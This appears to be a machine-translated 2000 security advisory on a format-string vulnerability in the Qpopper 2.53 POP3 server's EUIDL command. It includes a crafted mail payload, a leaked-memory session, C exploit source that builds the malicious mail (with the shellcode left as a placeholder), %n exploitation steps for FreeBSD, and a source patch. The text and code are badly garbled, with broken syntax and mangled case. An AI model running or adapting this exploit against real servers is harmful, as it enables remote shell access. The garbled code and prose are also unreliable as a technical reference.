Get the shell by qpopper2.53 remote
Creation time: 2000-05-27
Article attribute: original
Article submission:
Quack (QUACK_AT_XFOCUS.ORG)
Get the shell by qpopper2.53 remote
QUACK
Reference: Bufferoverflow SECRURITY ADVISORY # 5 by prizm
*
Qpopper is a relatively broad POP3 server that allows users to read their letters through POP3 clients.
It is usually used in the standard Unix system.
* Problem
In the version of QPopper 2.53, QPOP's vulnerability will make you remotely get a gid = mail's shell.
The problem is in the POP_MSG () function, when the user performs the EUIDL command, let us check QPOP
2.53 code:
-> Pop_UIDL.C, at the 150th line of code:
..............
Sprintf (Buffer, "% D% S", MSG_ID, MP-> UIDL_STR);
IF (nl = index (buffer, newline) * nl = 0;
Sprintf (Buffer, "% S% D% .128S", Buffer, MP-> Length, from_HDR (P, MP));
RETURN (POP_MSG (p, pop_success, buffer);
^^^^^^^^^^^^^
.................
The function POP_MSG () defined in pop_msg.c () is: POP_MSG (POP * P, INT Stat,
Const char * format, ...), here has a user entered Format :)
Ok, we imagine the following situation:
Mail from:
200 OK
RCPT TO:
200 OK
Data
200 OKEY, OKEY. End with "."
SUBJECT: STILL TRUST QPOP? = /
X-UIDL: Aaaaaaaaaaaaaaaaaa
From:% P% P% P% P% P% P% P
Test
.
200 Blablabla OK, Message Accepted for Delivery.
The user Luser then connects to his POP account and runs the EUIDL command:
OK QPOP (Version 2.53) AT B0F Starting. <666.666@b0f>
User Luser
OK Password Required for Luser.
Pass Secret
OK Luser Has 3 Messages (1644 OCTES).
EUIDL 3
OK 2 Aaaaaaaaaaaaaaaaa 530 0xBFBFC9B00X804FD740XBFBFC9B00X2120X8052E5E0XBFBFD1E80X8057028
Yeah, Thats from My Box with freebsd. As you can see, OUR% P% P% P% P% P% P% P
WHERE IMPLEMENTED AS ARGUMENTS for vsnprintf () Command.
* Utilization
Can you do it? Yes, of course!
But there is a small restriction. QPopper 2.53 will be more difficult to use than Linux, because
FreeBSD changes the vsprintf () call in the pop_msg.c function to vsnprintf () call, there is a significant difference between the two - of course also available :)
Utilization
------------
/ * QPOP_EUIDL.C EXPLOIT BY Prizm / Buffer0verflow Security
*
* Sample Exploit for buffer overflow in qpopper 2.53.
* This Little Proggie Generates a mail u Need to send.
*
* Standard DiscLaimer Applies.
* By The Way, Exploit Is Broken =) You NEED TO INSERT Shellcode.
*
* Mad Greets to TF8 for Pointing Out the bug, and all Other b0f members.
* Greets to ussrlabs and adm
* Check
http://b0f.freebsd.lublin.pl/ for news.
* /
#include
#include
Char shellcode [] = "imp";
Int main (int Argc, char * argv [])
{
INT I;
Unsigned long ra = 0;
IF (argc! = 2) {
FPRINTF (stderr, "usage:% s return_addr / n", argv [0]);
exit (0);
}
SSCANF (Argv [1], "% X", & ras
IF (! ra)
Return;
IF (SizeOf (shellcode) <12 || sizeof (shellcode)> 76) {
FPRINTF (stderr, "bad shellcode / n");
exit (0);
}
FPRINTF (stderr, "return address: 0x% .8x / n", ra);
Printf ("X-UIDL:");
For (i = 0; i Printf ("% C", shellcode [i]); Printf ("/ r / n"); Printf ("from:% s", "% .1000d"); For (i = 0; i <50; i ) Printf ("% C% C% C% C", (Ra & 0xFF), (Ra & 0xFF00) >> 8, (Ra & 0xFF0000) >> 16, (Ra & 0xFF000000) >> 24); Printf ("@ TEST / R / N"); Printf ("Subject: Test / R / N / R / NhuH? / R / N./R/N"); Return 0; } Use QPOP ports on FreeBSD --------------------- This is not too easy, because the function vsprintf () has been replaced by vsnprintf (), so we can't cause overflow, but we Can still control it - remember% N? Its principle is as follows: There is a tips using% N this. Take a look at the following code, can you understand why the result of its output is 2000, Instead of SizeOf (B): --- #include INT S = 1; char b [1024]; int in; Snprintf (B, SizeOf (b), "%. 200D% N", 1, & Q); RETURN PRINTF ("% D, OVERFLOWED?% S / N", Q, (s == 1? "no": "yes")); } --- --- I got the following results on my FreeBSD 3.4 machine: 2000, OVERFLOWED? NO Hey, I just started to see 1024, but you know - Sometimes the operation of the program is not easy to control, see below Perhaps some help. Exploiting IT: a) Find out the exact location of the user's input in the stack. b) Compose a Message with Filed X-UIDL AND FROM: X-UIDL: PPRETARETARETA From: among them: "PP" is used to populate (two to three bytes) "Reta" means the address of the returned shellcode "Shellcode" guess "Return" Returns Address c) If you need a FreeBSD version of the utilization program - your own hand :) * There are vulnerabilities 2.53 (other? Uncertain ...) * Patch You can Http://www.eudora.com/freeware/qpop.html#current Download version to qpopper 3.1 This problem has been resolved. Or you can modify the code yourself: In the 150 lines and 62 lines of POP_MSG.C, - RETURN (POP_MSG (P, Pop_suCcess, Buffer); change into: RETURN (POP_MSG (P, Pop_suCcess, "% s", buffer);
